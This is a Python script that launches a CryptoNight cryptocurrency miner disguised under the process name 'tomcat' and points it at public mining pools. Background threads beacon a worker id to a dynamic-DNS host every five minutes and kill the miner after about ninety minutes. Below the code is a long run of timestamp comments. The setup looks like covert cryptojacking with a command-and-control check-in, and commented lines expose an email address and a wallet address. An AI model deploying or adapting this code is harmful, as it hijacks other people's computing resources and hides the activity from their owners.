import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:46:01.548658
#2018-02-17 17:34:07.301171
#2018-02-17 19:21:07.575880
#2018-02-17 21:12:06.501244
#2018-02-17 22:55:08.680619
#2018-02-18 00:41:01.501776
#2018-02-18 02:30:06.790299
#2018-02-18 04:17:02.214989
#2018-02-18 06:07:01.819052
#2018-02-18 07:56:07.694387
#2018-02-18 09:46:05.887779
#2018-02-18 11:32:05.694694
#2018-02-18 13:17:05.840100
#2018-02-18 15:06:06.367522
#2018-02-18 16:53:05.357955
#2018-02-18 18:42:02.006322
#2018-02-18 20:29:06.823167
#2018-02-18 22:15:01.560201
#2018-02-19 00:04:06.241420
#2018-02-19 01:49:04.367857
#2018-02-19 03:37:06.806790
#2018-02-19 05:22:05.986213
#2018-02-19 07:09:01.795499
#2018-02-19 08:58:02.030583
#2018-02-19 10:46:09.102546
#2018-02-19 12:35:07.807538
#2018-02-19 14:22:04.678934
#2018-02-19 16:09:07.770849
#2018-02-19 17:56:09.285725
#2018-02-19 19:43:03.575522
#2018-02-19 21:32:07.630379
#2018-02-19 23:19:07.440994
#2018-02-20 01:06:01.411288
#2018-02-20 02:54:06.665974
#2018-02-20 04:43:01.777122
#2018-02-20 06:27:01.234292
#2018-02-20 08:12:01.427952
#2018-02-20 09:58:05.859996
#2018-02-20 11:42:01.977931
#2018-02-20 13:29:08.220517
#2018-02-20 15:13:04.280722
#2018-02-20 16:57:07.332941
#2018-02-20 18:45:11.414616
#2018-02-20 20:37:03.716071
#2018-02-20 22:21:01.720738
#2018-02-21 00:02:08.739894
#2018-02-21 01:47:01.812771
#2018-02-21 03:35:01.344777
#2018-02-21 05:24:01.768039
#2018-02-21 07:12:01.345727
#2018-02-21 08:56:08.411861
#2018-02-21 10:43:07.896664
#2018-02-21 12:31:05.576862
#2018-02-21 14:17:04.095060
#2018-02-21 16:04:09.988605
#2018-02-21 17:55:05.666531
#2018-02-21 19:41:05.113940
#2018-02-21 21:27:05.382018
#2018-02-21 23:15:03.394465
#2018-02-22 01:06:01.695587
#2018-02-22 02:53:01.864233
#2018-02-22 04:39:06.179876
#2018-02-22 06:24:04.097014
#2018-02-22 08:11:05.755595
#2018-02-22 09:59:04.331951
#2018-02-22 11:44:07.909074
#2018-02-22 13:31:04.722992
#2018-02-22 15:19:06.730968
#2018-02-22 17:04:09.038501
#2018-02-22 18:50:11.344820
#2018-02-22 20:41:06.935282
#2018-02-22 22:29:01.989152
#2018-02-23 00:14:07.099987
#2018-02-23 02:03:01.286986
#2018-02-23 03:51:02.070686
#2018-02-23 05:43:04.234536
#2018-02-23 07:28:05.592141
#2018-02-23 09:32:04.499582
#2018-02-23 11:37:07.494403
#2018-02-23 13:27:08.768156
#2018-02-23 15:14:06.593104
#2018-02-23 17:02:01.682130
#2018-02-23 18:51:01.500758
#2018-02-23 20:37:01.320566
#2018-02-23 22:24:03.906770
#2018-02-24 00:11:01.359013
#2018-02-24 02:03:03.981439
#2018-02-24 03:53:06.719651
#2018-02-24 05:39:03.911421
#2018-02-24 07:27:06.488197
#2018-02-24 09:15:06.462459
#2018-02-24 11:10:04.173543
#2018-02-24 12:59:03.258664
#2018-02-24 14:47:04.487473
#2018-02-24 16:39:05.971877
#2018-02-24 18:28:05.196970
#2018-02-24 20:15:03.964750
#2018-02-24 22:05:05.669374
#2018-02-25 01:03:06.276823
#2018-02-25 03:56:06.905776
#2018-02-25 07:56:03.762121